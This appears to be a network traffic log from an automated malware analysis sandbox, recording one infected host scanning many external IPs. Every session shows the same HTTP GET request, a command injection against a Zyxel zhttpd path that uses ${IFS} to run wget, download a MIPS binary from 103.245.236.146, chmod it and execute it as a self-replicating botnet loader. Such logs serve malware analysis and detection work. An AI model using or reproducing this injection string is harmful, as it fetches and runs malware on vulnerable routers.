                                      Jan 19, 2024 17:29:26.664758921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3150192.168.2.143768670.244.150.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664793968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3151192.168.2.143833418.81.139.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664834976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3152192.168.2.144220060.115.131.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664861917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3153192.168.2.1438072185.188.54.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664897919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3154192.168.2.145185241.95.211.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664942980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3155192.168.2.146057891.171.111.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.664994001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3156192.168.2.143619871.114.105.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.665033102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3157192.168.2.1434768216.74.123.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.665045977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3158192.168.2.145071039.131.84.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.665096045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3159192.168.2.145940640.238.154.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.665143013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3160192.168.2.145750227.56.179.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.665193081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3161192.168.2.1454170103.222.226.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.665222883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3162192.168.2.143554431.233.82.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.665266991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3163192.168.2.1453604118.213.172.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.665319920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3164192.168.2.1448040134.236.141.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.665353060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3165192.168.2.1437790148.6.88.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.665388107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3166192.168.2.1443512169.252.91.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.665436983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3167192.168.2.144838893.130.59.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.665461063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3168192.168.2.145878640.29.43.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.665493011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3169192.168.2.1457306220.14.22.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.665555954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3170192.168.2.1450702165.223.249.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.665601969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3171192.168.2.144151827.18.71.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.665626049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3172192.168.2.144332214.211.188.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.665672064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3173192.168.2.1441566128.174.175.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.665712118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3174192.168.2.146034834.11.4.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.665992022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3175192.168.2.144663670.39.228.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.666693926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3176192.168.2.143353036.136.136.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.667103052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3177192.168.2.143949699.87.193.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.668592930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3178192.168.2.1436850111.216.213.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.668673992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3179192.168.2.143305096.192.235.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.669001102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3180192.168.2.143790697.226.66.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.676553011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3181192.168.2.1444636135.212.158.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.676567078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3182192.168.2.1455506137.221.94.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.676606894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3183192.168.2.1443690137.43.114.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.676624060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3184192.168.2.144743451.127.216.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.676659107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3185192.168.2.14475245.28.142.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.676698923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3186192.168.2.1437022128.43.147.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.676727057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3187192.168.2.1435162196.233.109.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.676776886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3188192.168.2.1447060151.5.143.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.676804066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3189192.168.2.144173820.8.136.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.676837921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3190192.168.2.1441108108.207.15.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.676863909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3191192.168.2.1454636169.93.206.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.676886082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3192192.168.2.143982695.233.113.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.676923037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3193192.168.2.1437310138.105.88.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.676966906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3194192.168.2.1449800125.39.195.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677043915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3195192.168.2.144587239.87.132.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677081108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3196192.168.2.145545449.9.13.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677124023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3197192.168.2.1433340186.227.175.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677148104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3198192.168.2.144901269.24.158.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677191019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3199192.168.2.1432772190.105.169.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677223921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3200192.168.2.1447040169.30.53.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677243948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3201192.168.2.1457382102.224.3.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677303076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3202192.168.2.144793877.217.83.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677331924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3203192.168.2.1434318182.221.173.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677365065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3204192.168.2.144379644.130.110.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677407026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3205192.168.2.145625053.135.40.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677457094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3206192.168.2.1458658115.20.136.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677509069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3207192.168.2.1434284161.182.49.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677553892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3208192.168.2.14546041.153.174.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677573919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3209192.168.2.1460288106.150.57.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677614927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3210192.168.2.1449888221.241.229.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677664042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3211192.168.2.145803465.160.105.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677690983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3212192.168.2.1435540120.201.255.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.677742004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3213192.168.2.145746448.242.50.142443
                                      TimestampBytes transferredDirectionData
